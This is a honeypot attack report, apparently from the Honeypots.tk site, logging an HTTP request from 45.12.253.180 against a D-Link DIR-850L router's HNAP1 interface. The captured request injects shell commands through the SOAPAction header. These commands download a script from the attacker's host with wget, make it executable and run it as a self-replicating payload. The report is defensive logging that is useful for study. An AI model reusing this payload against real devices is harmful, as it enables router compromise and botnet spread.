Report of Attack 45.12.253.180 (180.253.12.45.in-addr.arpa) http detail

Header

Time	2023/01/17, 04:02:22 (GMT)
Transaction ID	Q1MG758Z87243G74
Service	http
Location	BG (Bulgaria)
Attacker	45.12.253.180
Classification	D-link overflow
Harm Potential	High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content

POST /HNAP1/ HTTP/1.1
Host: 46.4.222.114:80
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://45.12.253.180/a/wwgget.sh;chmod 777 wwgget.sh;sh wwgget.sh selfrep.dlink;rm -rf wwgget.sh`"
Content-Length: 0

All details are coming from honeypot central database.

Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin

If you like, you can support
with your donations to us..

Donate

Attack Report for Detail

Header

Time

2023/01/17, 04:02:22 (GMT)

Transaction ID

Q1MG758Z87243G74

Service

http

Location

BG (Bulgaria)

Attacker

45.12.253.180

Classification

D-link overflow

Harm Potential

High

Description

D-Link DIR-850L web admin interface contains a stack-based buffer overflow vulnerability

Content